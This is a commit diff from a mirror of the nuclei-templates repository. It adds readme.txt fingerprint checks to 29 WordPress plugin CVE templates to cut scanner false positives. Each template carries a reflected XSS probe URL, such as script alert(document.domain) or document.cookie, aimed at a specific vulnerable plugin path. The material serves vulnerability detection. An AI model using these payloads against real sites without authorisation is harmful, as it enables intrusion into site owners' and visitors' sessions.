daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Wordpress FP Fix

patch-1
Ritik Chaddha 2024-03-21 13:25:50 +05:30
parent 2ede6795a6
commit c68dd7249c
29 changed files with 389 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
http/cves/2008/CVE-2008-1061.yaml
View File

@ -30,7 +30,20 @@ info:
product: sniplets_plugin
tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Code Snippets'
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

13
http/cves/2011/CVE-2011-4624.yaml
View File

@ -29,7 +29,20 @@ info:
google-query: inurl:"/wp-content/plugins/flash-album-gallery"
tags: cve,cve2011,wordpress,xss,wp-plugin,codeasily
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Grand Flagallery'
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

13
http/cves/2011/CVE-2011-4926.yaml
View File

@ -30,7 +30,20 @@ info:
google-query: inurl:"/wp-content/plugins/adminimize/"
tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Adminimize ==='
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

13
http/cves/2011/CVE-2011-5179.yaml
View File

@ -28,7 +28,20 @@ info:
google-query: inurl:"/wp-content/plugins/skysa-official/"
tags: cve,cve2011,wordpress,xss,wp-plugin,skysa
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Skysa App'
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

13
http/cves/2011/CVE-2011-5181.yaml
View File

@ -28,7 +28,20 @@ info:
google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/"
tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'ClickDesk Live Support - Live Chat'
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

13
http/cves/2011/CVE-2011-5265.yaml
View File

@ -27,7 +27,20 @@ info:
google-query: inurl:"/wp-content/plugins/featurific-for-wordpress"
tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Featurific For Wordpress'
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

13
http/cves/2012/CVE-2012-1835.yaml
View File

@ -28,7 +28,20 @@ info:
google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar"
tags: cve,cve2012,wordpress,xss,wp-plugin,timely
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'All-in-One Event Calendar'
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

13
http/cves/2012/CVE-2012-2371.yaml
View File

@ -29,7 +29,20 @@ info:
product: wp-facethumb
tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'WP-FaceThumb ==='
- method: GET
path:
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

13
http/cves/2012/CVE-2012-4242.yaml
View File

@ -26,7 +26,20 @@ info:
product: mf_gig_calendar
tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'MF Gig Calendar ='
- method: GET
path:
- '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

15
http/cves/2012/CVE-2012-4273.yaml
View File

@ -30,7 +30,22 @@ info:
google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons"
tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/2-click-socialmedia-buttons/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- '2 Click Social Media Buttons'
- 'Tags:'
condition: and
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

13
http/cves/2012/CVE-2012-4768.yaml
View File

@ -29,7 +29,20 @@ info:
framework: wordpress
tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Download Monitor ='
- method: GET
path:
- '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

13
http/cves/2012/CVE-2012-5913.yaml
View File

@ -29,7 +29,20 @@ info:
product: wordpress_integrator
tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Wordpress Integrator'
- method: GET
path:
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'

15
http/cves/2013/CVE-2013-2287.yaml
View File

@ -27,7 +27,22 @@ info:
google-query: inurl:"/wp-content/plugins/uploader"
tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/uploader/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Uploader'
- "Tags:"
condition: and
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

19
http/cves/2013/CVE-2013-3526.yaml
View File

@ -29,17 +29,32 @@ info:
google-query: inurl:"/wp-content/plugins/trafficanalyzer"
tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'traffic analy'
- 'Tags:'
condition: and
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(1)</script>"
- "<script>alert(document.domain)</script>"
- type: word
part: header

13
http/cves/2013/CVE-2013-4117.yaml
View File

@ -30,7 +30,20 @@ info:
google-query: inurl:"/wp-content/plugins/category-grid-view-gallery"
tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/category-grid-view-gallery/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Category Grid View Gallery ='
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

13
http/cves/2013/CVE-2013-4625.yaml
View File

@ -29,7 +29,20 @@ info:
google-query: inurl:"/wp-content/plugins/duplicator"
tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/duplicator/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Duplicator - WordPress Migration'
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

13
http/cves/2014/CVE-2014-4513.yaml
View File

@ -28,7 +28,20 @@ info:
google-query: inurl:"/wp-content/plugins/activehelper-livehelp"
tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'ActiveHelper LiveHelp Live Chat'
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'

16
http/cves/2014/CVE-2014-4536.yaml
View File

@ -30,7 +30,23 @@ info:
google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/"
tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Infusionsoft'
- 'Tags:'
condition: and
case-insensitive: true
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"

15
http/cves/2014/CVE-2014-4539.yaml
View File

@ -28,7 +28,22 @@ info:
framework: wordpress
tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/movies/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Movies ='
- 'Tags:'
condition: and
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"

15
http/cves/2014/CVE-2014-4561.yaml
View File

@ -29,7 +29,22 @@ info:
framework: wordpress
tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/ultimate-weather-plugin/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Ultimate Weather'
- 'Tags:'
condition: and
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

13
http/cves/2014/CVE-2014-9094.yaml
View File

@ -30,7 +30,20 @@ info:
google-query: inurl:"/wp-content/plugins/dzs-videogallery"
tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/dzs-videogallery/readme HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Video Gallery WordPress DZS'
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'

2
http/cves/2015/CVE-2015-2755.yaml
View File

@ -30,7 +30,7 @@ info:
vendor: ab_google_map_travel_project
product: ab_google_map_travel
framework: wordpress
tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,packetstorm,ab_google_map_travel_project
tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project
http:
- raw:

15
http/cves/2015/CVE-2015-2807.yaml
View File

@ -31,7 +31,22 @@ info:
google-query: inurl:"/wp-content/plugins/navis-documentcloud"
tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/navis-documentcloud/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Navis'
- 'Tags:'
condition: and
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

13
http/cves/2015/CVE-2015-4127.yaml
View File

@ -30,7 +30,20 @@ info:
framework: wordpress
tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Church Admin ='
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

16
http/cves/2015/CVE-2015-6920.yaml
View File

@ -27,7 +27,23 @@ info:
framework: wordpress
tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'SourceAfrica'
- 'Tags:'
condition: and
case-insensitive: true
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

15
http/cves/2015/CVE-2015-9414.yaml
View File

@ -31,7 +31,22 @@ info:
google-query: inurl:"/wp-content/plugins/wp-symposium"
tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'WP Symposium'
- 'Tags:'
condition: and
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

13
http/cves/2016/CVE-2016-1000126.yaml
View File

@ -31,7 +31,20 @@ info:
google-query: inurl:"/wp-content/plugins/admin-font-editor"
tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/admin-font-editor/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Admin Font Editor'
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

13
http/cves/2016/CVE-2016-1000127.yaml
View File

@ -29,7 +29,20 @@ info:
framework: wordpress
tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/ajax-random-post/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Ajax Random Post'
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

15
http/cves/2016/CVE-2016-1000128.yaml
View File

@ -27,7 +27,22 @@ info:
google-query: inurl:"/wp-content/plugins/anti-plagiarism"
tags: cve2016,cve,wordpress,xss,wp-plugin,anti-plagiarism_project
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/anti-plagiarism/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'anti plagiarism'
- 'Tags:'
condition: and
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"